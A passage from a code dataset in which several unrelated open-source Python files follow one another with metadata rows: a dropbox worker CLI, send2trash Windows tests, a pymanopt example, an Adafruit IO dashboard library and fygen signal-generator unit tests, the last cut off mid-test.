        return self.length
| 33.391753 | 92 | 0.637851 | 2,223 | 0.686323 | 0 | 0 | 0 | 0 | 0 | 0 | 1,124 | 0.347021 |
a4f1604ce9428d0115f6455fe8e1046bdd00fa11 | 5,910 | py | Python | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | 1 | 2019-01-21T12:41:40.000Z | 2019-01-21T12:41:40.000Z | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | 1 | 2017-12-27T18:13:30.000Z | 2018-01-26T11:44:35.000Z | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | null | null | null | import click
from os import path, listdir, rename, remove
from datetime import datetime
from sys import exit
from multiprocessing import Pool
from signal import signal, SIGINT
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from threading import Condition
from .dropbox import DropboxContainer
class MyHandler(FileSystemEventHandler):
    """Watchdog handler that wakes the worker loop on directory changes."""

    def __init__(self, main_loop_cond):
        self.main_loop_cond = main_loop_cond

    def on_modified(self, event):
        # Wake whoever is blocked in main_loop_cond.wait(); the context
        # manager acquires the condition's lock and releases it on exit.
        with self.main_loop_cond:
            self.main_loop_cond.notify()
def keyboard_interrupt_handler(signal, frame):
    """SIGINT handler: announce the interrupt and terminate with status 0.

    Registered via signal(SIGINT, ...) in worker(); the arguments are the
    signal number and current stack frame supplied by the signal machinery.
    """
    # Parenthesized call form works under both Python 2 and Python 3
    # (the original bare `print ...` statement is a SyntaxError on Python 3).
    print('Caught keyboard interrupt. Exit.')
    exit(0)
def run_watchdog():
    """Placeholder for periodic maintenance tasks (not yet implemented)."""
    # once a day we should scan for old drop boxes
    # at noon we should test pgp keys
    # also: scan for and clean up watchdog entries
    pass
def process_drop(drop):
    """Claim a queued drop, process it, then remove its scratch token.

    Moving the submission token into the scratch directory acts as the
    claim: os.rename is atomic on a single filesystem, so only one worker
    can win the race for a given drop.
    """
    try:
        rename(
            path.join(drop.container.fs_submission_queue, drop.drop_id),
            path.join(drop.container.fs_scratch, drop.drop_id)
        )
    except OSError:
        # Token already claimed by another worker (or gone) — nothing to do.
        # (Previously a bare `except:` which also swallowed KeyboardInterrupt.)
        return
    drop.process()
    # remove token from scratch dir, we're done
    remove(path.join(drop.container.fs_scratch, drop.drop_id))
@click.command(help='performs sanity and config checks and cleans up old drops')
@click.option(
    '--root',
    '-r',
    default='var/drop_root/',
    help='''location of the dropbox container directory''')
def janitor(root):  # pragma: no cover
    """Check editor PGP keys for expiry problems and destroy stale drops.

    NOTE(review): `report` is accumulated below but never printed, mailed
    or returned — confirm where it was meant to go.
    """
    drop_root = root = DropboxContainer(root=root)
    # Scan pub keys for expired or soon to expired ones
    allkeys = root.gpg_context.list_keys()
    now = datetime.utcnow()
    report = ''
    for editor in drop_root.settings['editors']:
        # Match the editor's address against the uid strings of every key.
        key = [k for k in allkeys if editor in ', '.join(k['uids'])]
        if not bool(key):
            report = report + 'Editor %s does not have a public key in keyring.\n' % editor
            continue
        key = key[0]
        if not key.get('expires'):
            report = report + 'Editor %s has a key that never expires.\n' % editor
            continue
        keyexpiry = datetime.utcfromtimestamp(int(key['expires']))
        delta = keyexpiry - now
        if delta.days < 0:
            report = report + 'Editor %s has an expired key.\n' % editor
        elif delta.days < 60:
            report = report + 'Editor ' + editor + ' has a key that will expire in %d days.\n' % delta.days
    for drop in drop_root:
        age = now - drop.last_changed()
        # Watchdog-generated drops go stale after a day, real drops after a year.
        max_age = 365 if not drop.from_watchdog else 1
        if age.days > max_age:
            if not drop.from_watchdog:
                print('drop %s is expired. Removing it.' % drop)
                drop.destroy()
@click.command(help='debug processing of drops')
@click.option(
    '--root',
    '-r',
    default='var/drop_root/',
    help='''location of the dropbox container directory''')
@click.argument(
    'drop_id',
    required=False,
    default=None,
)
def debug(root, drop_id=None):  # pragma: no cover
    """Reprocess one drop (or every drop) whose status_int is 20."""
    container = DropboxContainer(root=root)
    if drop_id is None:
        drops = container
    else:
        drops = [container.get_dropbox(drop_id)]
    for drop in drops:
        print('debugging %s' % drop)
        if drop.status_int == 20:
            drop.process()
@click.command(help='Scans dropbox submission directory for unprocessed drops and processes them')
@click.option(
    '--root',
    '-r',
    default='var/drop_root/',
    help='''location of the dropbox container directory''')
def debug_worker(root):  # pragma: no cover
    """Synchronous debugging variant of worker(): busy-polls the submission
    queue forever and processes each ready drop inline (no watchdog, no
    process pool)."""
    drop_root = DropboxContainer(root=root)
    while True:
        for drop_id in listdir(drop_root.fs_submission_queue):
            print(drop_id)
            drop = drop_root.get_dropbox(drop_id)
            # Only look at drops that actually are for us
            if drop.status_int == 20:
                process_drop(drop)
            else:
                print('Not processing drop %s with status %d ' % (drop.drop_id, drop.status_int))
@click.command(help='listens for changes to submission directory and processes them asynchronously')
@click.option(
    '--root',
    '-r',
    default='var/drop_root/',
    help='''location of the dropbox container directory''')
@click.option(
    '--async/--no-async',
    'use_async',
    default=True,
    help='''process asynchronously''')
def worker(root, use_async=True):  # pragma: no cover
    """Watch the submission queue and process new drops as they arrive.

    A watchdog observer notifies a Condition whenever the submission
    directory changes; each wake-up rescans the directory and processes
    every drop with status 20. Drops with attachments are handed to a
    process pool when --async is set, otherwise handled inline.

    Note: the Python parameter is named `use_async` (mapped explicitly from
    the --async/--no-async flag) because `async` is a reserved word on
    Python 3.7+; the CLI is unchanged.
    """
    drop_root = DropboxContainer(root=root)
    settings = drop_root.settings
    # Setup multiprocessing pool with that amount of workers as
    # implied by the amount of worker jails
    if use_async:
        workers = Pool(processes=settings.get('num_workers', 1))
    # Setup the condition object that we will wait for, it
    # signals changes in the directory
    condition = Condition()
    # Setup and run the actual file system event watcher
    event_handler = MyHandler(condition)
    observer = Observer()
    observer.schedule(event_handler, drop_root.fs_submission_queue, recursive=False)
    observer.start()
    signal(SIGINT, keyboard_interrupt_handler)
    # grab lock, scan submission dir for jobs and process them
    condition.acquire()
    while True:
        for drop_id in listdir(drop_root.fs_submission_queue):
            print(drop_id)
            drop = drop_root.get_dropbox(drop_id)
            # Only look at drops that actually are for us
            if drop.status_int == 20:
                # process drops without attachments synchronously
                if use_async and drop.num_attachments > 0:
                    workers.map_async(process_drop, [drop])
                else:
                    process_drop(drop)
            else:
                print('Not processing drop %s with status %d ' % (drop.drop_id, drop.status_int))
        # Wait for directory content to change
        condition.wait()
    condition.release()
| 30.942408 | 107 | 0.642978 | 274 | 0.046362 | 0 | 0 | 4,650 | 0.786802 | 0 | 0 | 1,765 | 0.298646 |
a4f36624a0ebfb5fad3f19befd7baacdcb07a66d | 4,703 | py | Python | tests/test_plat_win.py | juliangilbey/send2trash | 2eb3242cd9c646174d88e71e4a5dd503f5001c94 | [
"BSD-3-Clause"
] | null | null | null | tests/test_plat_win.py | juliangilbey/send2trash | 2eb3242cd9c646174d88e71e4a5dd503f5001c94 | [
"BSD-3-Clause"
] | null | null | null | tests/test_plat_win.py | juliangilbey/send2trash | 2eb3242cd9c646174d88e71e4a5dd503f5001c94 | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
import os
import shutil
import sys
import unittest
from os import path as op
from tempfile import gettempdir
from send2trash import send2trash as s2t
# import the two versions as well as the "automatic" version
from send2trash.plat_win_modern import send2trash as s2t_modern
from send2trash.plat_win_legacy import send2trash as s2t_legacy
@unittest.skipIf(sys.platform != "win32", "Windows only")
class TestNormal(unittest.TestCase):
    """Trash short-path files via the auto-selected, modern and legacy APIs."""

    def setUp(self):
        self.dirname = "\\\\?\\" + op.join(gettempdir(), "python.send2trash")
        self.file = op.join(self.dirname, "testfile.txt")
        self._create_tree(self.file)
        self.files = []
        for index in range(10):
            self.files.append(
                op.join(self.dirname, "testfile{}.txt".format(index))
            )
        for name in self.files:
            self._create_tree(name)

    def tearDown(self):
        shutil.rmtree(self.dirname, ignore_errors=True)

    def _create_tree(self, path):
        parent = op.dirname(path)
        if not op.isdir(parent):
            os.makedirs(parent)
        with open(path, "w") as writer:
            writer.write("send2trash test")

    def _trash_file(self, fcn):
        fcn(self.file)
        self.assertFalse(op.exists(self.file))

    def _trash_multifile(self, fcn):
        fcn(self.files)
        self.assertFalse(any(op.exists(name) for name in self.files))

    def _file_not_found(self, fcn):
        missing = op.join(self.dirname, "otherfile.txt")
        self.assertRaises(WindowsError, fcn, missing)

    def test_trash_file(self):
        self._trash_file(s2t)

    def test_trash_multifile(self):
        self._trash_multifile(s2t)

    def test_file_not_found(self):
        self._file_not_found(s2t)

    def test_trash_file_modern(self):
        self._trash_file(s2t_modern)

    def test_trash_multifile_modern(self):
        self._trash_multifile(s2t_modern)

    def test_file_not_found_modern(self):
        self._file_not_found(s2t_modern)

    def test_trash_file_legacy(self):
        self._trash_file(s2t_legacy)

    def test_trash_multifile_legacy(self):
        self._trash_multifile(s2t_legacy)

    def test_file_not_found_legacy(self):
        self._file_not_found(s2t_legacy)
@unittest.skipIf(sys.platform != "win32", "Windows only")
class TestLongPath(unittest.TestCase):
    """Trash files whose paths exceed the classic MAX_PATH limit.

    Paths are built from four nested 100-character directory names under
    the "\\\\?\\" prefix (Windows extended-length path syntax), so the
    exact lengths matter to what is being exercised.
    """

    def setUp(self):
        # NOTE(review): self.functions is never used by any test — confirm
        # whether it was meant to drive a parametrized loop.
        self.functions = {s2t: "auto", s2t_legacy: "legacy", s2t_modern: "modern"}
        filename = "A" * 100
        self.dirname = "\\\\?\\" + op.join(gettempdir(), filename)
        path = op.join(
            self.dirname,
            filename,
            filename,  # From there, the path is not trashable from Explorer
            filename,
            filename + "{}.txt",
        )
        self.file = path.format("")
        self._create_tree(self.file)
        self.files = [path.format(index) for index in range(10)]
        [self._create_tree(file) for file in self.files]

    def tearDown(self):
        shutil.rmtree(self.dirname, ignore_errors=True)

    def _create_tree(self, path):
        # Create all parent directories, then a small text file at `path`.
        dirname = op.dirname(path)
        if not op.isdir(dirname):
            os.makedirs(dirname)
        with open(path, "w") as writer:
            writer.write("Looong filename!")

    def _trash_file(self, fcn):
        fcn(self.file)
        self.assertFalse(op.exists(self.file))

    def _trash_multifile(self, fcn):
        fcn(self.files)
        self.assertFalse(any([op.exists(file) for file in self.files]))

    def _trash_folder(self, fcn):
        fcn(self.dirname)
        self.assertFalse(op.exists(self.dirname))

    def test_trash_file(self):
        self._trash_file(s2t)

    def test_trash_multifile(self):
        self._trash_multifile(s2t)

    # Folder tests are skipped when the CWD and temp dir live on different
    # drives (the operation cannot cross drives for long paths).
    @unittest.skipIf(
        op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
        "Cannot trash long path from other drive",
    )
    def test_trash_folder(self):
        self._trash_folder(s2t)

    def test_trash_file_modern(self):
        self._trash_file(s2t_modern)

    def test_trash_multifile_modern(self):
        self._trash_multifile(s2t_modern)

    @unittest.skipIf(
        op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
        "Cannot trash long path from other drive",
    )
    def test_trash_folder_modern(self):
        self._trash_folder(s2t_modern)

    def test_trash_file_legacy(self):
        self._trash_file(s2t_legacy)

    def test_trash_multifile_legacy(self):
        self._trash_multifile(s2t_legacy)

    @unittest.skipIf(
        op.splitdrive(os.getcwd())[0] != op.splitdrive(gettempdir())[0],
        "Cannot trash long path from other drive",
    )
    def test_trash_folder_legacy(self):
        self._trash_folder(s2t_legacy)
| 30.341935 | 88 | 0.652775 | 4,224 | 0.89815 | 0 | 0 | 4,340 | 0.922815 | 0 | 0 | 451 | 0.095896 |
a4f3cb4f3427bfd4ee51df95f9cda15b80ddc419 | 1,133 | py | Python | examples/closest_unit_norm_column_approximation.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | examples/closest_unit_norm_column_approximation.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | examples/closest_unit_norm_column_approximation.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import theano.tensor as T
from numpy import linalg as la, random as rnd
import pymanopt
from pymanopt.manifolds import Oblique
from pymanopt.solvers import ConjugateGradient
def closest_unit_norm_column_approximation(A):
"""
Returns the matrix with unit-norm columns that is closests to A w.r.t. the
Frobenius norm.
"""
m, n = A.shape
manifold = Oblique(m, n)
solver = ConjugateGradient()
X = T.matrix()
@pymanopt.function.Theano(X)
def cost(X):
return 0.5 * T.sum((X - A) ** 2)
problem = pymanopt.Problem(manifold, cost=cost)
return solver.solve(problem)
if __name__ == "__main__":
# Generate random problem data.
m = 5
n = 8
A = rnd.randn(m, n)
# Calculate the actual solution by normalizing the columns of A.
X = A / la.norm(A, axis=0)[np.newaxis, :]
# Solve the problem with pymanopt.
Xopt = closest_unit_norm_column_approximation(A)
# Print information about the solution.
print('')
print("solution found: %s" % np.allclose(X, Xopt, rtol=1e-3))
print("Frobenius-error: %f" % la.norm(X - Xopt))
| 25.177778 | 78 | 0.662842 | 0 | 0 | 0 | 0 | 86 | 0.075905 | 0 | 0 | 331 | 0.292145 |
a4f4c9000cc124929e416388dbabf46666c286f5 | 9,821 | py | Python | adafruit_dash_display.py | adafruit/Adafruit_CircuitPython_Dash_Display | db7a1113c00e11c0a2d35ceb425cbb057b07ba61 | [
"Unlicense",
"MIT-0",
"MIT"
] | 2 | 2021-05-14T18:39:47.000Z | 2022-03-19T16:08:53.000Z | adafruit_dash_display.py | adafruit/Adafruit_CircuitPython_Dash_Display | db7a1113c00e11c0a2d35ceb425cbb057b07ba61 | [
"Unlicense",
"MIT-0",
"MIT"
] | 1 | 2021-09-27T17:36:56.000Z | 2021-09-27T17:36:56.000Z | adafruit_dash_display.py | adafruit/Adafruit_CircuitPython_Dash_Display | db7a1113c00e11c0a2d35ceb425cbb057b07ba61 | [
"Unlicense",
"MIT-0",
"MIT"
] | 3 | 2021-05-18T11:34:49.000Z | 2022-02-18T03:33:49.000Z | # SPDX-FileCopyrightText: Copyright (c) 2021 Dylan Herrada for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_dash_display`
================================================================================
CircuitPython library for creating Adafruit IO dashboards.
* Author(s): Dylan Herrada
Implementation Notes
--------------------
**Hardware:**
* This library currently only officially supports the
`Adafruit Funhouse <https://www.adafruit.com/product/4985>`_ but other boards are coming soon.
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
import time
from collections import OrderedDict
from adafruit_display_shapes.rect import Rect
from adafruit_display_text.label import Label
import displayio
import terminalio
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Dash_Display.git"
class Feed:
    """State holder for a single Adafruit IO feed shown on the dashboard.

    The original class wrapped every field in a trivial property pair; since
    none of the getters/setters did any work, plain attributes are
    behaviorally identical for all external access and far less code.

    Attributes:
        key: Adafruit IO feed key.
        default_text: text shown before the first value arrives.
        text: format string applied to incoming values (``formatted_text``).
        callback: callable(client, feed_id, message) -> display text.
        color: optional callable(message) -> text color, or None.
        pub: callable invoked when this feed's value is published.
        index: position of this feed's label within the display group.
        last_val: most recently received value (None until first message).
    """

    def __init__(
        self, key, default_text, formatted_text, callback, color, pub, index
    ):  # pylint: disable=too-many-arguments
        self.key = key
        self.default_text = default_text
        self.text = formatted_text
        self.callback = callback
        self.color = color
        self.pub = pub
        self.index = index
        self.last_val = None
class Hub:  # pylint: disable=too-many-instance-attributes
    """ Object that lets you make an IOT dashboard.

    Owns the display group (``splash``): splash[0] is the white highlight
    rectangle, and each feed's Label sits at splash[feed.index + 1].
    Navigation buttons move the highlight; select publishes the highlighted
    feed's last value via its ``pub`` callback.
    """

    def __init__(self, display, io, nav):
        self.display = display
        self.io = io  # pylint: disable=invalid-name
        # nav is a 5-tuple of button inputs: up, select, down, back, submit.
        self.up_btn, self.select, self.down, self.back, self.submit = nav
        self.length = 0
        # 1-based index of the highlighted row (splash[0] is the rectangle).
        self.selected = 1
        self.feeds = OrderedDict()
        self.io.on_mqtt_connect = self.connected
        self.io.on_mqtt_disconnect = self.disconnected
        self.io.on_mqtt_subscribe = self.subscribe
        self.io.on_message = self.message
        print("Connecting to Adafruit IO...")
        io.connect()
        self.display.show(None)
        self.splash = displayio.Group()
        # Highlight bar for the first (topmost) row.
        self.rect = Rect(0, 0, 240, 30, fill=0xFFFFFF)
        self.splash.append(self.rect)
        self.display.show(self.splash)

    def simple_text_callback(
        self, client, feed_id, message
    ):  # pylint: disable=unused-argument
        """Default callback function that uses the text in the Feed object and the color callback
        to set the text"""
        feed_id = feed_id.split("/")[-1]
        feed = self.feeds[feed_id]
        try:
            text = feed.text.format(message)
        except ValueError:
            # Retry with a float for format specs like {:.1f}.
            text = feed.text.format(float(message))
        return text

    def update_text(self, client, feed_id, message):
        """ Updates the text on the display """
        feed = self.feeds[feed_id]
        # NOTE(review): the callback is invoked twice here (once discarded,
        # once for the label text) — confirm the first call is intentional.
        feed.callback(client, feed_id, message)
        self.splash[feed.index + 1].text = feed.callback(client, feed_id, str(message))
        if feed.color:
            self.splash[feed.index + 1].color = feed.color(message)

    def base_pub(self, var):
        """ Default function called when a feed is published to (no-op). """

    def add_device(
        self,
        feed_key,
        default_text=None,
        formatted_text=None,
        color_callback=None,
        callback=None,
        pub_method=None,
    ):  # pylint: disable=too-many-arguments
        """ Adds a feed/device to the UI.

        Subscribes to ``feed_key``, appends a Label row to the display group
        and records a Feed object keyed by ``feed_key``. Falls back to
        simple_text_callback / base_pub / "<key> : {}" defaults when the
        optional arguments are omitted.
        """
        if not callback:
            callback = self.simple_text_callback
        if not pub_method:
            pub_method = self.base_pub
        if not formatted_text:
            formatted_text = f"{feed_key} : "
        # Always append a placeholder for the incoming value.
        formatted_text = formatted_text + "{}"
        if not default_text:
            default_text = feed_key
        self.io.subscribe(feed_key)
        # First row is drawn in black (over the white highlight rectangle);
        # later rows in white, each 30 pixels below the previous one.
        if len(self.splash) == 1:
            self.splash.append(
                Label(
                    font=terminalio.FONT,
                    text=default_text,
                    x=3,
                    y=15,
                    anchored_position=(3, 15),
                    scale=2,
                    color=0x000000,
                )
            )
        else:
            self.splash.append(
                Label(
                    font=terminalio.FONT,
                    x=3,
                    y=((len(self.splash) - 1) * 30) + 15,
                    text=default_text,
                    color=0xFFFFFF,
                    anchored_position=(3, ((len(self.splash) - 2) * 30) + 15),
                    scale=2,
                )
            )
        self.length = len(self.splash) - 2
        self.feeds[feed_key] = Feed(
            key=feed_key,
            default_text=default_text,
            formatted_text=formatted_text,
            callback=callback,
            color=color_callback,
            pub=pub_method,
            index=len(self.feeds),
        )

    def get(self):
        """ Gets all the subscribed feeds """
        for feed in self.feeds.keys():
            print(f"getting {feed}")
            self.io.get(feed)
            time.sleep(0.1)
        self.io.loop()

    # pylint: disable=unused-argument
    @staticmethod
    def connected(client):
        """ Callback for when the device is connected to Adafruit IO """
        print("Connected to Adafruit IO!")

    @staticmethod
    def subscribe(client, userdata, topic, granted_qos):
        """ Callback for when a new feed is subscribed to """
        print("Subscribed to {0} with QOS level {1}".format(topic, granted_qos))

    @staticmethod
    def disconnected(client):
        """ Callback for when the device disconnects from Adafruit IO """
        print("Disconnected from Adafruit IO!")

    def message(self, client, feed_id, message):
        """ Callback for whenever a new message is received """
        print("Feed {0} received new value: {1}".format(feed_id, message))
        feed_id = feed_id.split("/")[-1]
        feed = self.feeds[feed_id]
        feed.last_val = message
        self.update_text(client, feed_id, str(message))

    def publish(self, feed, message):
        """ Callback for publishing a message """
        print(f"Publishing {message} to {feed}")
        self.io.publish(feed, message)

    def loop(self):
        """ Loops Adafruit IO and also checks to see if any buttons have been pressed """
        self.io.loop()
        if self.select.value:
            # Publish the highlighted feed's last value, then block until
            # the select button is released (debounce).
            feed = self.feeds[list(self.feeds.keys())[self.selected - 1]]
            if feed.pub:
                feed.pub(feed.last_val)
            self.display.show(self.splash)
            while self.select.value:
                pass
        # Moving the highlight: the bit arithmetic below inverts each RGB
        # byte (255 - component) to toggle a label between its normal color
        # and its inverse as the highlight bar moves over it.
        if self.down.value and self.selected < self.length + 1:
            rgb = self.splash[self.selected].color
            color = (
                ((255 - ((rgb >> 16) & 0xFF)) << 16)
                + ((255 - ((rgb >> 8) & 0xFF)) << 8)
                + (255 - (rgb & 0xFF))
            )
            self.splash[self.selected].color = color
            self.rect.y += 30
            self.selected += 1
            rgb = self.splash[self.selected].color
            color = (
                ((255 - ((rgb >> 16) & 0xFF)) << 16)
                + ((255 - ((rgb >> 8) & 0xFF)) << 8)
                + (255 - (rgb & 0xFF))
            )
            self.splash[self.selected].color = color
        if self.up_btn.value and self.selected > 1:
            rgb = self.splash[self.selected].color
            color = (
                ((255 - ((rgb >> 16) & 0xFF)) << 16)
                + ((255 - ((rgb >> 8) & 0xFF)) << 8)
                + (255 - (rgb & 0xFF))
            )
            self.splash[self.selected].color = color
            self.rect.y -= 30
            self.selected -= 1
            rgb = self.splash[self.selected].color
            color = (
                ((255 - ((rgb >> 16) & 0xFF)) << 16)
                + ((255 - ((rgb >> 8) & 0xFF)) << 8)
                + (255 - (rgb & 0xFF))
            )
            self.splash[self.selected].color = color
| 31.376997 | 98 | 0.558904 | 8,855 | 0.901639 | 0 | 0 | 2,145 | 0.21841 | 0 | 0 | 2,720 | 0.276958 |
a4f76b804fae0302852d3bd4593e94302e1fe66e | 34,936 | py | Python | fygen_test.py | vanish125/DS1054_BodePlotter | 569d3b97d8a0a657dd27d7b30b152fa78203995b | [
"MIT"
] | null | null | null | fygen_test.py | vanish125/DS1054_BodePlotter | 569d3b97d8a0a657dd27d7b30b152fa78203995b | [
"MIT"
] | null | null | null | fygen_test.py | vanish125/DS1054_BodePlotter | 569d3b97d8a0a657dd27d7b30b152fa78203995b | [
"MIT"
] | 1 | 2022-01-18T16:58:18.000Z | 2022-01-18T16:58:18.000Z | """Unit tests for fygen module."""
import unittest
import six
import fygen
import fygen_help
from wavedef import SUPPORTED_DEVICES
# pylint: disable=too-many-public-methods
# pylint: disable=invalid-name
# pylint: disable=too-many-lines
class FakeSerial(object):
  """Fake serial object for when more interaction is required."""

  def __init__(self, read_lines):
    self.read_lines = read_lines
    self.write_lines = []

  def getvalue(self):
    """Returns everything written so far as one decoded string."""
    return ''.join(self.write_lines)

  def write(self, line):
    self.write_lines.append(line.decode('utf8'))

  # pylint: disable=unused-argument
  # pylint: disable=no-self-use
  def flush(self):
    pass

  def read(self, unused_length):
    return '\n'

  def reset_input_buffer(self):
    pass

  def reset_output_buffer(self):
    pass

  def read_until(self, terminator='\n', size=0):
    """fake read_until method: pops the next canned response."""
    return self.read_lines.pop(0)
  # pylint: enable=unused-argument
  # pylint: enable=no-self-use
class TestFYGen(unittest.TestCase):
  """Test harness for FYGen.

  Conventions visible throughout: commands prefixed 'WM' target channel 0
  and 'WF' target channel 1; FakeSerial-based tests enable
  read_before_write, and a canned read matching the desired state means
  only the 'R..' query (no 'W..' write) appears in the output.
  """
  def setUp(self):
    # Capture generated commands in a StringIO instead of a real port.
    self.output = six.StringIO()
    self.fy = fygen.FYGen(
        port=self.output,
        init_state=False,
        device_name='fy2300',
    )
  def tearDown(self):
    self.fy.close()
  def test_help(self):
    """Asserts that all help sections render."""
    for section in range(len(fygen_help.SECTIONS)):
      fygen.help(section, fout=self.output)
    self.assertIn('Other Help Sections', self.output.getvalue())
  def test_help_device(self):
    """Tests calling help with a device name."""
    for section in range(len(fygen_help.SECTIONS)):
      fygen.help(section, 'fy2300', self.output)
    self.assertIn('Other Help Sections', self.output.getvalue())
  def test_help_invalid_section(self):
    """Provides an invalid help section number."""
    with self.assertRaises(fygen.HelpError):
      fygen.help(len(fygen_help.SECTIONS))
  def test_get_version(self):
    """Tests the version command."""
    self.assertEqual(1.0, fygen.get_version())
  def test_autoset(self):
    """Tests autoset functionality."""
    fy = fygen.FYGen(port=self.output)
    fy.set((0, 1))
    val = self.output.getvalue()
    self.assertIn('WMN0\n', val)
    self.assertIn('WFN0\n', val)
  def test_autoset_with_args(self):
    """Tests autoset with additional arguments provided."""
    fy = fygen.FYGen(port=self.output)
    fy.set(wave='square', volts=0.1)
    val = self.output.getvalue()
    self.assertIn('WMW01\n', val)
    self.assertIn('WMA0.10\n', val)
  def test_send(self):
    """Tests the low-level send."""
    fs = FakeSerial([b'foo\n', b'bar\n'])
    fy = fygen.FYGen(port=fs)
    fy.is_serial = True
    self.assertEqual('foo', fy.send('foocmd'))
    self.assertEqual('bar', fy.send('barcmd'))
    self.assertEqual('foocmd\nbarcmd\n', fs.getvalue())
  def test_send_too_short(self):
    """Provides a command that is too short."""
    with self.assertRaises(fygen.CommandTooShortError):
      self.fy.send('FO')
  def test_set_enable(self):
    """Enables generator on both channels."""
    self.fy.set(channel=(0, 1), volts=3, enable=True)
    self.assertEqual(
        'WMA3.00\n'
        'WMN1\n'
        'WFA3.00\n'
        'WFN1\n',
        self.output.getvalue())
  def test_already_enabled(self):
    """Tests WMN1 is not sent if the channel is already enabled."""
    fs = FakeSerial([b'1\n'])
    fy = fygen.FYGen(port=fs, init_state=False)
    fy.is_serial = True
    fy.read_before_write = True
    fy.set(0, enable=True)
    # Only the read query appears; the write was suppressed.
    self.assertEqual('RMN\n', fs.getvalue())
  def test_set_disable(self):
    """Tests disable function on both channels."""
    fy = fygen.FYGen(port=self.output, default_channel=(0, 1), init_state=False)
    fy.set(volts=3, enable=False)
    self.assertEqual(
        'WMN0\n'
        'WMA3.00\n'
        'WFN0\n'
        'WFA3.00\n',
        self.output.getvalue())
  def test_already_disabled(self):
    """Tests that WMN0 is not sent if the channel is already disabled."""
    fs = FakeSerial([b'0\n'])
    fy = fygen.FYGen(port=fs, init_state=False)
    fy.is_serial = True
    fy.read_before_write = True
    fy.set(0, enable=False)
    self.assertEqual('RMN\n', fs.getvalue())
  def test_invalid_channel(self):
    """Passes an invalid channel."""
    with self.assertRaises(fygen.InvalidChannelError):
      self.fy.set(channel=2)
  def test_set_wave1(self):
    """Sets current wave by name."""
    self.fy.set(wave='sin')
    self.fy.set(channel=1, wave='square')
    self.assertEqual(
        'WMW00\n'
        'WFW01\n',
        self.output.getvalue())
  def test_set_wave2(self):
    """Sets current wave by number."""
    self.fy.set(wave=46)
    self.assertEqual('WMW46\n', self.output.getvalue())
  def test_wave_already_set(self):
    """Asserts a wave that is already square is not reset to square."""
    fs = FakeSerial([b'1\n'])
    fy = fygen.FYGen(port=fs, init_state=False)
    fy.is_serial = True
    fy.read_before_write = True
    fy.set(0, wave='square')
    self.assertEqual('RMW\n', fs.getvalue())
  def test_unknown_wave(self):
    """Passes an unknown waveform name."""
    with self.assertRaises(fygen.UnknownWaveformError):
      self.fy.set(wave='foo')
  def test_invalid_wave_index(self):
    """Passes an invalid waveform index."""
    with self.assertRaises(fygen.UnknownWaveformError):
      self.fy.set(wave=-1)
  def test_set_freq1(self):
    """Sets a frequency using freq_hz.

    Frequency commands carry a 14-digit zero-padded value in uHz.
    """
    self.fy.set(freq_hz=5000)
    self.fy.set(channel=1, freq_hz=1e6)
    self.assertEqual(
        'WMF00005000000000\n'
        'WFF01000000000000\n',
        self.output.getvalue())
  def test_set_freq2(self):
    """Sets a frequency using freq_uhz."""
    self.fy.set(freq_uhz=5000)
    self.fy.set(channel=1, freq_uhz=1e6)
    self.assertEqual(
        'WMF00000000005000\n'
        'WFF00000001000000\n',
        self.output.getvalue())
  def test_freq_already_set1(self):
    """Tests that a frequency is not reset to the same thing."""
    fs = FakeSerial([b'12345\n'])
    fy = fygen.FYGen(port=fs, init_state=False)
    fy.is_serial = True
    fy.read_before_write = True
    fy.set(0, freq_hz=12345)
    self.assertEqual('RMF\n', fs.getvalue())
  def test_freq_already_set2(self):
    """Tests that a frequency is not reset to the same thing."""
    fs = FakeSerial([b'1234.5\n'])
    fy = fygen.FYGen(port=fs, init_state=False)
    fy.is_serial = True
    fy.read_before_write = True
    fy.set(0, freq_uhz=1234500000)
    self.assertEqual('RMF\n', fs.getvalue())
  def test_set_both_frequencies(self):
    """Tries passing both freq_hz and freq_uhz."""
    with self.assertRaises(fygen.InvalidFrequencyError):
      self.fy.set(freq_hz=4000, freq_uhz=5000)
  def test_invalid_freq1(self):
    """Tries passing a negative frequency (freq_hz version)."""
    with self.assertRaises(fygen.InvalidFrequencyError):
      self.fy.set(freq_hz=-1)
  def test_invalid_freq2(self):
    """Tries passing a negative frequency (freq_uhz version)."""
    with self.assertRaises(fygen.InvalidFrequencyError):
      self.fy.set(freq_uhz=-1)
  def test_set_volts(self):
    """Sets voltage amplitude on both channels."""
    self.fy.set(volts=10)
    self.fy.set(channel=1, volts=0)
    self.assertEqual(
        'WMA10.00\n'
        'WFA0.00\n',
        self.output.getvalue())
def test_volts_already_set(self):
"""Tries to set the voltage to an already set value."""
fs = FakeSerial([b'56000\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, volts=5.6)
self.assertEqual('RMA\n', fs.getvalue())
def test_volts_too_low(self):
"""Tries to set the voltage to a negative value."""
fy = fygen.FYGen(port=self.output)
with self.assertRaises(fygen.InvalidVoltageError):
fy.set(volts=-0.1)
def test_volts_too_high(self):
"""Tries to set the voltage higher than the allowed maximum."""
fy = fygen.FYGen(port=self.output, max_volts=1.5)
with self.assertRaises(fygen.InvalidVoltageError):
fy.set(volts=1.6)
def test_duty_cycle(self):
    """Sets the duty cycle on both channels."""
    self.fy.set(duty_cycle=0.5)
    self.fy.set(channel=1, duty_cycle=0.9)
